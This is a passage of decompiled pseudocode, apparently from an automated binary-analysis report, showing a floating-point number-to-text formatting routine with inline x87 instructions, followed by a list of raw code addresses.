                                                              						}
                                                              						asm("fxch st0, st3");
                                                              						asm("fcom st0, st2");
                                                              						asm("fnstsw ax");
                                                              						if((_t210 & 0x00000041) == 0) {
                                                              							do {
                                                              								_t395 = _t395 / st2;
                                                              								_t319 = _t319 + 1;
                                                              								asm("fcom st0, st2");
                                                              								asm("fnstsw ax");
                                                              							} while ((_t210 & 0x00000041) == 0);
                                                              							 *(_t373 + 0x3c) = _t319;
                                                              						}
                                                              					}
                                                              					if(_t346 != 2) {
                                                              						L41:
                                                              						__eflags = _t290 - 1;
                                                              						if(_t290 != 1) {
                                                              							st0 = _t395;
                                                              						} else {
                                                              							st3 = _t395;
                                                              						}
                                                              						goto L44;
                                                              					} else {
                                                              						if(_t366 == 0) {
                                                              							_t366 = _t346 - 1;
                                                              						}
                                                              						if(_t290 != 0) {
                                                              							_t366 = _t366 - 1;
                                                              							__eflags = _t366;
                                                              							goto L41;
                                                              						} else {
                                                              							st0 = _t395;
                                                              							_t210 = (_t210 | 0xffffffff) - _t319;
                                                              							_t366 = _t366 + _t210;
                                                              							if(_t366 >= 0) {
                                                              								L44:
                                                              								_t394 = st2;
                                                              								asm("fxch st0, st4");
                                                              								asm("fcomp st0, st3");
                                                              								asm("fnstsw ax");
                                                              								__eflags = _t210 & 0x00000041;
                                                              								if((_t210 & 0x00000041) != 0) {
                                                              									st2 = _t394;
                                                              								} else {
                                                              									st3 = _t394;
                                                              									asm("fxch st0, st1");
                                                              									asm("fchs");
                                                              									asm("fxch st0, st2");
                                                              									asm("fxch st0, st1");
                                                              								}
                                                              								_t395 =  *0xc81ce8;
                                                              								asm("fcomp st0, st3");
                                                              								asm("fnstsw ax");
                                                              								__eflags = _t210 & 0x00000005;
                                                              								if((_t210 & 0x00000005) != 0) {
                                                              									goto L34;
                                                              								} else {
                                                              									asm("fnstcw word [esp+0x10]");
                                                              									__eflags = _t366 - 9;
                                                              									 *(_t373 + 0x34) =  *(_t373 + 0x10) & 0x0000ffff | 0x00000c00;
                                                              									asm("fldcw word [esp+0x34]");
                                                              									asm("fistp qword [esp+0x34]");
                                                              									_t348 =  *(_t373 + 0x34);
                                                              									asm("fldcw word [esp+0x10]");
                                                              									if(_t366 > 9) {
                                                              										_t366 = 9;
                                                              									}
                                                              									_t215 = _t366;
                                                              									_t397 = st1;
                                                              									__eflags = _t366;
                                                              									if(_t366 != 0) {
                                                              										do {
                                                              											_t215 = _t215 - 1;
                                                              											__eflags = _t215;
                                                              											_t397 = _t397 * st1;
                                                              										} while (_t215 != 0);
                                                              									}
                                                              									_t216 = E00C6CCF0(_t215, st0);
                                                              									_t333 = _t216;
                                                              									 *(_t373 + 0x34) = _t333;
                                                              									asm("fisub dword [esp+0x34]");
                                                              									_t399 =  *0xc81bf8;
                                                              									asm("fcom st0, st1");
                                                              									asm("fnstsw ax");
                                                              									st1 = _t399;
                                                              									__eflags = _t216 & 0x00000041;
                                                              									if((_t216 & 0x00000041) == 0) {
                                                              										_t333 = _t333 + 1;
                                                              										__eflags = _t333;
                                                              									}
                                                              									_t217 = _t366;
                                                              									__eflags = _t366;
                                                              									if(_t366 != 0) {
                                                              										while(1) {
                                                              											_t217 = _t217 - 1;
                                                              											__eflags = _t217;
                                                              											asm("fxch st0, st2");
                                                              											_t399 = _t399 * st1;
                                                              											if(_t217 == 0) {
                                                              												break;
                                                              											}
                                                              											asm("fxch st0, st2");
                                                              										}
                                                              										st1 = _t399;
                                                              										asm("fxch st0, st1");
                                                              									} else {
                                                              										st1 = _t399;
                                                              									}
                                                              									_t293 = _t348;
                                                              									 *(_t373 + 0x34) = _t293;
                                                              									asm("fild dword [esp+0x34]");
                                                              									__eflags = _t293;
                                                              									if(_t293 < 0) {
                                                              									}
                                                              									asm("fsubp st3, st0");
                                                              									asm("fxch st0, st2");
                                                              									asm("fmulp st1, st0");
                                                              									_t218 = E00C6CCF0(_t217, st0);
                                                              									_t294 = _t218;
                                                              									 *(_t373 + 0x34) = _t294;
                                                              									asm("fisub dword [esp+0x34]");
                                                              									asm("fcompp");
                                                              									asm("fnstsw ax");
                                                              									__eflags = _t218 & 0x00000001;
                                                              									if((_t218 & 0x00000001) == 0) {
                                                              										_t294 = _t294 + 1;
                                                              										__eflags = _t294;
                                                              									}
                                                              									__eflags = _t294 - _t333;
                                                              									if(_t294 >= _t333) {
                                                              										_t348 = _t348 + 1;
                                                              										_t294 = _t294 - _t333;
                                                              										__eflags = _t294;
                                                              									}
                                                              									while(1) {
                                                              										_t321 = 0xcccccccd * _t348 >> 0x20 >> 3;
                                                              										_t350 =  *(_t373 + 0x24);
                                                              										 *((char*)(_t373 + _t350 + 0x40)) =  *((intOrPtr*)(_t348 - _t321 + _t321 * 4 + _t321 + _t321 * 4 + "0123456789"));
                                                              										_t225 = _t350 + 1;
                                                              										_t348 = _t321;
                                                              										 *(_t373 + 0x24) = _t225;
                                                              										__eflags = _t348;
                                                              										if(_t348 == 0) {
                                                              											break;
                                                              										}
                                                              										__eflags = _t225 - 0x14;
                                                              										if(_t225 < 0x14) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									__eflags = _t225 - 0x14;
                                                              									if(_t225 == 0x14) {
                                                              										_t225 = 0x13;
                                                              										 *(_t373 + 0x24) = 0x13;
                                                              									}
                                                              									_t334 =  *(_t373 + 0x28);
                                                              									 *((char*)(_t373 + _t225 + 0x40)) = 0;
                                                              									__eflags = _t366;
                                                              									if(_t366 > 0) {
                                                              										while(1) {
                                                              											L71:
                                                              											__eflags =  *((intOrPtr*)(_t373 + 0xa0)) - 2;
                                                              											if( *((intOrPtr*)(_t373 + 0xa0)) != 2) {
                                                              												break;
                                                              											}
                                                              											__eflags = _t334;
                                                              											if(_t334 != 0) {
                                                              												break;
                                                              											} else {
                                                              												_t329 = 0xcccccccd * _t294 >> 0x20 >> 3;
                                                              												_t280 = _t329 + _t329 * 4;
                                                              												__eflags = _t294 != _t329 + _t329 * 4 + _t280;
                                                              												if(_t294 != _t329 + _t329 * 4 + _t280) {
                                                              													break;
                                                              												} else {
                                                              													_t366 = _t366 - 1;
                                                              													_t294 = _t329;
                                                              													__eflags = _t366;
                                                              													if(_t366 > 0) {
                                                              														continue;
                                                              													} else {
                                                              														L79:
                                                              														 *(_t373 + 0x28) = _t334;
                                                              													}
                                                              												}
                                                              											}
                                                              											goto L80;
                                                              										}
                                                              										_t327 = 0xcccccccd * _t294 >> 0x20 >> 3;
                                                              										_t93 = _t294 - _t327 + _t327 * 4 + _t327 + _t327 * 4 + "0123456789"; // 0x33323130
                                                              										 *((char*)(_t373 + _t334 + 0x54)) =  *_t93;
                                                              										_t334 = _t334 + 1;
                                                              										__eflags = _t334 - _t366;
                                                              										_t294 = _t327;
                                                              										if(_t334 < _t366) {
                                                              											goto L71;
                                                              										} else {
                                                              											 *(_t373 + 0x28) = _t334;
                                                              											__eflags = _t334 - 0x14;
                                                              											if(_t334 == 0x14) {
                                                              												_t334 = 0x13;
                                                              												goto L79;
                                                              											}
                                                              										}
                                                              									}
                                                              									L80:
                                                              									__eflags =  *(_t373 + 0x30) - 1;
                                                              									 *((char*)(_t373 + _t334 + 0x54)) = 0;
                                                              									if( *(_t373 + 0x30) != 1) {
                                                              										_t351 =  *(_t373 + 0x20);
                                                              										goto L90;
                                                              									} else {
                                                              										_t311 =  *(_t373 + 0x3c);
                                                              										__eflags = _t311;
                                                              										if(_t311 < 0) {
                                                              											_t311 =  ~_t311;
                                                              										}
                                                              										_t361 =  *(_t373 + 0x20);
                                                              										while(1) {
                                                              											_t271 = (0x66666667 * _t311 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t311 >> 0x20 >> 2);
                                                              											_t324 = _t271 + _t271 * 4;
                                                              											_t325 = _t271 + _t271 * 4 + _t324;
                                                              											 *((char*)(_t373 + _t361 + 0x68)) =  *((intOrPtr*)(_t311 - _t271 + _t271 * 4 + _t324 + "0123456789"));
                                                              											_t311 = _t271;
                                                              											_t351 = _t361 + 1;
                                                              											__eflags = _t311;
                                                              											if(_t311 <= 0) {
                                                              												break;
                                                              											}
                                                              											__eflags = _t351 - 0x14;
                                                              											if(_t351 < 0x14) {
                                                              												continue;
                                                              											} else {
                                                              												_pop(_t344);
                                                              												_pop(_t362);
                                                              												_pop(_t288);
                                                              												__eflags =  *(_t373 + 0x6c) ^ _t373;
                                                              												return E00C69C26(0, _t288,  *(_t373 + 0x6c) ^ _t373, _t325, _t344, _t362);
                                                              											}
                                                              											goto L144;
                                                              										}
                                                              										 *(_t373 + 0x20) = _t351;
                                                              										__eflags = _t351 - 1;
                                                              										if(_t351 == 1) {
                                                              											_t351 = 2;
                                                              											 *((char*)(_t373 + 0x69)) = 0x30;
                                                              											 *(_t373 + 0x20) = 2;
                                                              										}
                                                              										L90:
                                                              										_t319 =  *(_t373 + 0x2c);
                                                              										_t319 = _t366;
                                                              										_t230 =  *((intOrPtr*)(_t373 + 0x94)) - (0 | _t319 != 0x00000000) - (0 | _t366 > 0x00000000) -  *(_t373 + 0x24) - _t366;
                                                              										__eflags =  *(_t373 + 0x30) - 1;
                                                              										 *(_t373 + 0x10) = _t230;
                                                              										if( *(_t373 + 0x30) == 1) {
                                                              											_t230 = _t230 + 0xfffffffe - _t351;
                                                              											__eflags = _t230;
                                                              											 *(_t373 + 0x10) = _t230;
                                                              										}
                                                              										_t300 = _t366 - _t334;
                                                              										__eflags = _t300;
                                                              										 *(_t373 + 0x34) = _t300;
                                                              										if(_t300 < 0) {
                                                              											 *(_t373 + 0x34) = 0;
                                                              										}
                                                              										__eflags = _t230;
                                                              										if(_t230 < 0) {
                                                              											_t230 = 0;
                                                              											__eflags = 0;
                                                              											 *(_t373 + 0x10) = 0;
                                                              										}
                                                              										_t301 =  *(_t373 + 0x9c);
                                                              										__eflags = _t301 & 0x00000001;
                                                              										if((_t301 & 0x00000001) != 0) {
                                                              											_t230 =  ~_t230;
                                                              											 *(_t373 + 0x10) = _t230;
                                                              										}
                                                              										__eflags = _t301 & 0x00000010;
                                                              										if((_t301 & 0x00000010) == 0) {
                                                              											__eflags = _t230;
                                                              											if(_t230 <= 0) {
                                                              												goto L110;
                                                              											} else {
                                                              												while(1) {
                                                              													_t319 =  *(_t373 + 0x1c);
                                                              													_t259 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c), 0x20);
                                                              													_t373 = _t373 + 8;
                                                              													__eflags = _t259;
                                                              													if(_t259 == 0) {
                                                              														goto L35;
                                                              													}
                                                              													_t261 =  *(_t373 + 0x10) - 1;
                                                              													 *(_t373 + 0x10) = _t261;
                                                              													__eflags = _t261;
                                                              													if(_t261 > 0) {
                                                              														continue;
                                                              													} else {
                                                              														goto L110;
                                                              													}
                                                              													goto L144;
                                                              												}
                                                              												goto L35;
                                                              											}
                                                              										} else {
                                                              											__eflags = _t230;
                                                              											if(_t230 <= 0) {
                                                              												L110:
                                                              												__eflags =  *(_t373 + 0x2c);
                                                              												if( *(_t373 + 0x2c) == 0) {
                                                              													L112:
                                                              													__eflags =  *(_t373 + 0x24);
                                                              													if( *(_t373 + 0x24) <= 0) {
                                                              														L116:
                                                              														__eflags = _t366;
                                                              														if(_t366 > 0) {
                                                              															L118:
                                                              															_t368 =  *(_t373 + 0x1c);
                                                              															_t352 =  *((intOrPtr*)(_t373 + 0x18));
                                                              															_t335 =  *(_t373 + 0x14);
                                                              															_t231 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c), 0x2e);
                                                              															_t373 = _t373 + 8;
                                                              															__eflags = _t231;
                                                              															if(_t231 == 0) {
                                                              																goto L35;
                                                              															} else {
                                                              																__eflags =  *(_t373 + 0x28);
                                                              																if( *(_t373 + 0x28) <= 0) {
                                                              																	goto L125;
                                                              																} else {
                                                              																	while(1) {
                                                              																		 *(_t373 + 0x30) =  *(_t373 + 0x28) - 1;
                                                              																		_t252 = E00BA7DE0(_t284, _t335, _t352, _t368,  *((char*)(_t373 +  *(_t373 + 0x28) + 0x53)));
                                                              																		_t373 = _t373 + 8;
                                                              																		__eflags = _t252;
                                                              																		if(_t252 == 0) {
                                                              																			goto L35;
                                                              																		}
                                                              																		__eflags =  *(_t373 + 0x28);
                                                              																		if( *(_t373 + 0x28) > 0) {
                                                              																			continue;
                                                              																		} else {
                                                              																			goto L125;
                                                              																		}
                                                              																		goto L144;
                                                              																	}
                                                              																	goto L35;
                                                              																}
                                                              															}
                                                              														} else {
                                                              															__eflags =  *(_t373 + 0x9c) & 0x00000008;
                                                              															if(( *(_t373 + 0x9c) & 0x00000008) == 0) {
                                                              																_t335 =  *(_t373 + 0x14);
                                                              																_t352 =  *((intOrPtr*)(_t373 + 0x18));
                                                              																_t368 =  *(_t373 + 0x1c);
                                                              																L125:
                                                              																__eflags =  *(_t373 + 0x34);
                                                              																if( *(_t373 + 0x34) <= 0) {
                                                              																	L129:
                                                              																	__eflags =  *(_t373 + 0x30) - 1;
                                                              																	if( *(_t373 + 0x30) != 1) {
                                                              																		L139:
                                                              																		__eflags =  *(_t373 + 0x10);
                                                              																		if( *(_t373 + 0x10) >= 0) {
                                                              																			L143:
                                                              																			_pop(_t336);
                                                              																			_pop(_t353);
                                                              																			_pop(_t286);
                                                              																			__eflags =  *(_t373 + 0x7c) ^ _t373;
                                                              																			return E00C69C26(1, _t286,  *(_t373 + 0x7c) ^ _t373, _t319, _t336, _t353);
                                                              																		} else {
                                                              																			_t337 =  *(_t373 + 0x14);
                                                              																			_t354 =  *((intOrPtr*)(_t373 + 0x18));
                                                              																			_t370 =  *(_t373 + 0x1c);
                                                              																			while(1) {
                                                              																				_t234 = E00BA7DE0(_t284, _t337, _t354, _t370, 0x20);
                                                              																				_t373 = _t373 + 8;
                                                              																				__eflags = _t234;
                                                              																				if(_t234 == 0) {
                                                              																					goto L35;
                                                              																				}
                                                              																				_t203 = _t373 + 0x10;
                                                              																				 *_t203 =  *(_t373 + 0x10) + 1;
                                                              																				__eflags =  *_t203;
                                                              																				if( *_t203 < 0) {
                                                              																					continue;
                                                              																				} else {
                                                              																					goto L143;
                                                              																				}
                                                              																				goto L144;
                                                              																			}
                                                              																			goto L35;
                                                              																		}
                                                              																	} else {
                                                              																		_t319 =  !( *(_t373 + 0x9c)) & 0x00000020 | 0x00000045;
                                                              																		_t239 = E00BA7DE0(_t284, _t335, _t352, _t368,  !( *(_t373 + 0x9c)) & 0x00000020 | 0x00000045);
                                                              																		_t373 = _t373 + 8;
                                                              																		__eflags = _t239;
                                                              																		if(_t239 == 0) {
                                                              																			goto L35;
                                                              																		} else {
                                                              																			__eflags =  *(_t373 + 0x3c);
                                                              																			if( *(_t373 + 0x3c) >= 0) {
                                                              																				_t240 = E00BA7DE0(_t284, _t335, _t352, _t368, 0x2b);
                                                              																				_t373 = _t373 + 8;
                                                              																				__eflags = _t240;
                                                              																				if(_t240 == 0) {
                                                              																					goto L35;
                                                              																				} else {
                                                              																					goto L135;
                                                              																				}
                                                              																			} else {
                                                              																				_t245 = E00BA7DE0(_t284, _t335, _t352, _t368, 0x2d);
                                                              																				_t373 = _t373 + 8;
                                                              																				__eflags = _t245;
                                                              																				if(_t245 != 0) {
                                                              																					L135:
                                                              																					__eflags =  *(_t373 + 0x20);
                                                              																					if( *(_t373 + 0x20) <= 0) {
                                                              																						goto L139;
                                                              																					} else {
                                                              																						while(1) {
                                                              																							 *(_t373 + 0x20) =  *(_t373 + 0x20) - 1;
                                                              																							_t244 = E00BA7DE0(_t284, _t335, _t352, _t368,  *((char*)(_t373 +  *(_t373 + 0x20) - 1 + 0x68)));
                                                              																							_t373 = _t373 + 8;
                                                              																							__eflags = _t244;
                                                              																							if(_t244 == 0) {
                                                              																								goto L35;
                                                              																							}
                                                              																							__eflags =  *(_t373 + 0x20);
                                                              																							if( *(_t373 + 0x20) > 0) {
                                                              																								continue;
                                                              																							} else {
                                                              																								goto L139;
                                                              																							}
                                                              																							goto L144;
                                                              																						}
                                                              																						goto L35;
                                                              																					}
                                                              																				} else {
                                                              																					_pop(_t338);
                                                              																					_pop(_t355);
                                                              																					_pop(_t287);
                                                              																					__eflags =  *(_t373 + 0x6c) ^ _t373;
                                                              																					return E00C69C26(_t245, _t287,  *(_t373 + 0x6c) ^ _t373, _t319, _t338, _t355);
                                                              																				}
                                                              																			}
                                                              																		}
                                                              																	}
                                                              																} else {
                                                              																	_t335 =  *(_t373 + 0x14);
                                                              																	_t352 =  *((intOrPtr*)(_t373 + 0x18));
                                                              																	_t368 =  *(_t373 + 0x1c);
                                                              																	while(1) {
                                                              																		_t247 = E00BA7DE0(_t284, _t335, _t352, _t368, 0x30);
                                                              																		_t373 = _t373 + 8;
                                                              																		__eflags = _t247;
                                                              																		if(_t247 == 0) {
                                                              																			goto L35;
                                                              																		}
                                                              																		_t249 =  *(_t373 + 0x34) - 1;
                                                              																		 *(_t373 + 0x34) = _t249;
                                                              																		__eflags = _t249;
                                                              																		if(_t249 > 0) {
                                                              																			continue;
                                                              																		} else {
                                                              																			goto L129;
                                                              																		}
                                                              																		goto L144;
                                                              																	}
                                                              																	goto L35;
                                                              																}
                                                              															} else {
                                                              																goto L118;
                                                              															}
                                                              														}
                                                              													} else {
                                                              														while(1) {
                                                              															_t253 =  *(_t373 + 0x24);
                                                              															_t319 =  *((char*)(_t373 + _t253 + 0x3f));
                                                              															 *(_t373 + 0x24) = _t253 - 1;
                                                              															_t256 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c),  *((char*)(_t373 + _t253 + 0x3f)));
                                                              															_t373 = _t373 + 8;
                                                              															__eflags = _t256;
                                                              															if(_t256 == 0) {
                                                              																goto L35;
                                                              															}
                                                              															__eflags =  *(_t373 + 0x24);
                                                              															if( *(_t373 + 0x24) > 0) {
                                                              																continue;
                                                              															} else {
                                                              																goto L116;
                                                              															}
                                                              															goto L144;
                                                              														}
                                                              														goto L35;
                                                              													}
                                                              												} else {
                                                              													_t258 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c),  *(_t373 + 0x2c));
                                                              													_t373 = _t373 + 8;
                                                              													__eflags = _t258;
                                                              													if(_t258 == 0) {
                                                              														goto L35;
                                                              													} else {
                                                              														goto L112;
                                                              													}
                                                              												}
                                                              											} else {
                                                              												__eflags = _t319;
                                                              												if(_t319 == 0) {
                                                              													L103:
                                                              													__eflags = _t230;
                                                              													if(_t230 <= 0) {
                                                              														goto L110;
                                                              													} else {
                                                              														while(1) {
                                                              															_t262 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c), 0x30);
                                                              															_t373 = _t373 + 8;
                                                              															__eflags = _t262;
                                                              															if(_t262 == 0) {
                                                              																goto L35;
                                                              															}
                                                              															_t264 =  *(_t373 + 0x10) - 1;
                                                              															 *(_t373 + 0x10) = _t264;
                                                              															__eflags = _t264;
                                                              															if(_t264 > 0) {
                                                              																continue;
                                                              															} else {
                                                              																goto L110;
                                                              															}
                                                              															goto L144;
                                                              														}
                                                              														goto L35;
                                                              													}
                                                              												} else {
                                                              													_t319 =  *(_t373 + 0x2c);
                                                              													_t266 = E00BA7DE0(_t284,  *(_t373 + 0x14),  *((intOrPtr*)(_t373 + 0x18)),  *(_t373 + 0x1c),  *(_t373 + 0x2c));
                                                              													_t373 = _t373 + 8;
                                                              													__eflags = _t266;
                                                              													if(_t266 == 0) {
                                                              														goto L35;
                                                              													} else {
                                                              														_t140 = _t373 + 0x10;
                                                              														 *_t140 =  *(_t373 + 0x10) - 1;
                                                              														__eflags =  *_t140;
                                                              														_t230 =  *(_t373 + 0x10);
                                                              														 *(_t373 + 0x2c) = 0;
                                                              														goto L103;
                                                              													}
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              							} else {
                                                              								st2 = _t395;
                                                              								L34:
                                                              								st0 = _t395;
                                                              								st1 = _t395;
                                                              								st0 = _t395;
                                                              								L35:
                                                              								_pop(_t332);
                                                              								_pop(_t347);
                                                              								_pop(_t285);
                                                              								return E00C69C26(0, _t285,  *(_t373 + 0x6c) ^ _t373, _t319, _t332, _t347);
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				L144:
                                                              			}








































































                                                              0x00ba83e2
                                                              0x00ba84ee
                                                              0x00ba84f0
                                                              0x00ba84f4
                                                              0x00ba84f6
                                                              0x00000000
                                                              0x00ba84f8
                                                              0x00000000
                                                              0x00ba84f8
                                                              0x00ba83e8
                                                              0x00ba83ea
                                                              0x00ba83ec
                                                              0x00ba83f1
                                                              0x00ba83f7
                                                              0x00ba83fd
                                                              0x00ba83ff
                                                              0x00ba8401
                                                              0x00ba8404
                                                              0x00ba840d
                                                              0x00ba840f
                                                              0x00ba8420
                                                              0x00ba84e5
                                                              0x00000000
                                                              0x00ba8426
                                                              0x00ba8426
                                                              0x00ba8429
                                                              0x00ba842b
                                                              0x00ba842d
                                                              0x00ba842f
                                                              0x00ba8434
                                                              0x00ba843b
                                                              0x00ba843e
                                                              0x00ba8440
                                                              0x00ba8442
                                                              0x00ba8444
                                                              0x00ba844c
                                                              0x00ba844e
                                                              0x00ba8450
                                                              0x00ba8452
                                                              0x00ba8455
                                                              0x00ba84e7
                                                              0x00ba84e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8455
                                                              0x00ba8411
                                                              0x00ba8411
                                                              0x00ba8413
                                                              0x00ba8415
                                                              0x00ba8417
                                                              0x00ba841a
                                                              0x00ba845b
                                                              0x00ba845b
                                                              0x00ba841c
                                                              0x00ba841c
                                                              0x00ba841c
                                                              0x00ba841a
                                                              0x00ba8460
                                                              0x00ba8406
                                                              0x00ba8406
                                                              0x00ba8406
                                                              0x00ba83f3
                                                              0x00ba83f3
                                                              0x00ba83f3
                                                              0x00ba8462
                                                              0x00ba8466
                                                              0x00ba8468
                                                              0x00ba846a
                                                              0x00ba846c
                                                              0x00ba8471
                                                              0x00ba8473
                                                              0x00ba8475
                                                              0x00ba8477
                                                              0x00ba847c
                                                              0x00ba847e
                                                              0x00ba847e
                                                              0x00ba8480
                                                              0x00ba8481
                                                              0x00ba8483
                                                              0x00ba8485
                                                              0x00ba8487
                                                              0x00ba8489
                                                              0x00ba848e
                                                              0x00ba848e
                                                              0x00ba8492
                                                              0x00ba8494
                                                              0x00ba8496
                                                              0x00ba849b
                                                              0x00ba849d
                                                              0x00ba849d
                                                              0x00ba849f
                                                              0x00ba84a0
                                                              0x00ba84a2
                                                              0x00ba84a4
                                                              0x00ba84a9
                                                              0x00ba84a9
                                                              0x00ba849b
                                                              0x00ba84b0
                                                              0x00ba84fe
                                                              0x00ba84fe
                                                              0x00ba8501
                                                              0x00ba8507
                                                              0x00ba8503
                                                              0x00ba8503
                                                              0x00ba8503
                                                              0x00000000
                                                              0x00ba84b2
                                                              0x00ba84b4
                                                              0x00ba84b6
                                                              0x00ba84b6
                                                              0x00ba84bb
                                                              0x00ba84fd
                                                              0x00ba84fd
                                                              0x00000000
                                                              0x00ba84bd
                                                              0x00ba84c0
                                                              0x00ba84c2
                                                              0x00ba84c4
                                                              0x00ba84c6
                                                              0x00ba8509
                                                              0x00ba8509
                                                              0x00ba850b
                                                              0x00ba850d
                                                              0x00ba850f
                                                              0x00ba8511
                                                              0x00ba8514
                                                              0x00ba859d
                                                              0x00ba851a
                                                              0x00ba851a
                                                              0x00ba851c
                                                              0x00ba851e
                                                              0x00ba8520
                                                              0x00ba8522
                                                              0x00ba8522
                                                              0x00ba8524
                                                              0x00ba852a
                                                              0x00ba852c
                                                              0x00ba852e
                                                              0x00ba8531
                                                              0x00000000
                                                              0x00ba8533
                                                              0x00ba8533
                                                              0x00ba8543
                                                              0x00ba8546
                                                              0x00ba854a
                                                              0x00ba854e
                                                              0x00ba8552
                                                              0x00ba8556
                                                              0x00ba855a
                                                              0x00ba855c
                                                              0x00ba855c
                                                              0x00ba8561
                                                              0x00ba8563
                                                              0x00ba8565
                                                              0x00ba8567
                                                              0x00ba8569
                                                              0x00ba8569
                                                              0x00ba8569
                                                              0x00ba856c
                                                              0x00ba856c
                                                              0x00ba8569
                                                              0x00ba8572
                                                              0x00ba8577
                                                              0x00ba8579
                                                              0x00ba857d
                                                              0x00ba8581
                                                              0x00ba8587
                                                              0x00ba8589
                                                              0x00ba858b
                                                              0x00ba858d
                                                              0x00ba8590
                                                              0x00ba8592
                                                              0x00ba8592
                                                              0x00ba8592
                                                              0x00ba8593
                                                              0x00ba8595
                                                              0x00ba8597
                                                              0x00ba85a3
                                                              0x00ba85a3
                                                              0x00ba85a3
                                                              0x00ba85a6
                                                              0x00ba85a8
                                                              0x00ba85aa
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba85a1
                                                              0x00ba85a1
                                                              0x00ba85ac
                                                              0x00ba85ae
                                                              0x00ba8599
                                                              0x00ba8599
                                                              0x00ba8599
                                                              0x00ba85b0
                                                              0x00ba85b2
                                                              0x00ba85b6
                                                              0x00ba85ba
                                                              0x00ba85bc
                                                              0x00ba85bc
                                                              0x00ba85c4
                                                              0x00ba85c6
                                                              0x00ba85c8
                                                              0x00ba85cc
                                                              0x00ba85d1
                                                              0x00ba85d3
                                                              0x00ba85d7
                                                              0x00ba85db
                                                              0x00ba85dd
                                                              0x00ba85df
                                                              0x00ba85e2
                                                              0x00ba85e4
                                                              0x00ba85e4
                                                              0x00ba85e4
                                                              0x00ba85e5
                                                              0x00ba85e7
                                                              0x00ba85e9
                                                              0x00ba85ea
                                                              0x00ba85ea
                                                              0x00ba85ea
                                                              0x00ba85f0
                                                              0x00ba85f7
                                                              0x00ba8607
                                                              0x00ba860b
                                                              0x00ba8611
                                                              0x00ba8612
                                                              0x00ba8614
                                                              0x00ba8618
                                                              0x00ba861a
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba861c
                                                              0x00ba861f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba861f
                                                              0x00ba8621
                                                              0x00ba8624
                                                              0x00ba8626
                                                              0x00ba862b
                                                              0x00ba862b
                                                              0x00ba862f
                                                              0x00ba8633
                                                              0x00ba8638
                                                              0x00ba863a
                                                              0x00ba8640
                                                              0x00ba8640
                                                              0x00ba8640
                                                              0x00ba8648
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba864a
                                                              0x00ba864c
                                                              0x00000000
                                                              0x00ba864e
                                                              0x00ba8655
                                                              0x00ba8658
                                                              0x00ba865f
                                                              0x00ba8661
                                                              0x00000000
                                                              0x00ba8663
                                                              0x00ba8663
                                                              0x00ba8664
                                                              0x00ba8666
                                                              0x00ba8668
                                                              0x00000000
                                                              0x00ba866a
                                                              0x00ba869c
                                                              0x00ba869c
                                                              0x00ba869c
                                                              0x00ba8668
                                                              0x00ba8661
                                                              0x00000000
                                                              0x00ba864c
                                                              0x00ba8673
                                                              0x00ba867d
                                                              0x00ba8683
                                                              0x00ba8687
                                                              0x00ba8688
                                                              0x00ba868a
                                                              0x00ba868c
                                                              0x00000000
                                                              0x00ba868e
                                                              0x00ba868e
                                                              0x00ba8692
                                                              0x00ba8695
                                                              0x00ba8697
                                                              0x00000000
                                                              0x00ba8697
                                                              0x00ba8695
                                                              0x00ba868c
                                                              0x00ba86a0
                                                              0x00ba86a0
                                                              0x00ba86a5
                                                              0x00ba86aa
                                                              0x00ba871c
                                                              0x00000000
                                                              0x00ba86ac
                                                              0x00ba86ac
                                                              0x00ba86b0
                                                              0x00ba86b2
                                                              0x00ba86b4
                                                              0x00ba86b4
                                                              0x00ba86b6
                                                              0x00ba86c0
                                                              0x00ba86cf
                                                              0x00ba86d1
                                                              0x00ba86d4
                                                              0x00ba86de
                                                              0x00ba86e2
                                                              0x00ba86e4
                                                              0x00ba86e5
                                                              0x00ba86e7
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba86e9
                                                              0x00ba86ec
                                                              0x00000000
                                                              0x00ba86ee
                                                              0x00ba86ee
                                                              0x00ba86ef
                                                              0x00ba86f3
                                                              0x00ba86f8
                                                              0x00ba8702
                                                              0x00ba8702
                                                              0x00000000
                                                              0x00ba86ec
                                                              0x00ba8703
                                                              0x00ba8707
                                                              0x00ba870a
                                                              0x00ba870c
                                                              0x00ba8711
                                                              0x00ba8716
                                                              0x00ba8716
                                                              0x00ba8720
                                                              0x00ba8720
                                                              0x00ba8736
                                                              0x00ba8741
                                                              0x00ba8743
                                                              0x00ba8748
                                                              0x00ba874c
                                                              0x00ba8755
                                                              0x00ba8755
                                                              0x00ba8757
                                                              0x00ba8757
                                                              0x00ba875d
                                                              0x00ba875d
                                                              0x00ba875f
                                                              0x00ba8763
                                                              0x00ba8765
                                                              0x00ba8765
                                                              0x00ba876d
                                                              0x00ba876f
                                                              0x00ba8771
                                                              0x00ba8771
                                                              0x00ba8773
                                                              0x00ba8773
                                                              0x00ba8777
                                                              0x00ba877e
                                                              0x00ba8781
                                                              0x00ba8783
                                                              0x00ba8785
                                                              0x00ba8785
                                                              0x00ba8789
                                                              0x00ba878c
                                                              0x00ba87fe
                                                              0x00ba8800
                                                              0x00000000
                                                              0x00ba8802
                                                              0x00ba8802
                                                              0x00ba8802
                                                              0x00ba8811
                                                              0x00ba8816
                                                              0x00ba8819
                                                              0x00ba881b
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8825
                                                              0x00ba8826
                                                              0x00ba882a
                                                              0x00ba882c
                                                              0x00000000
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
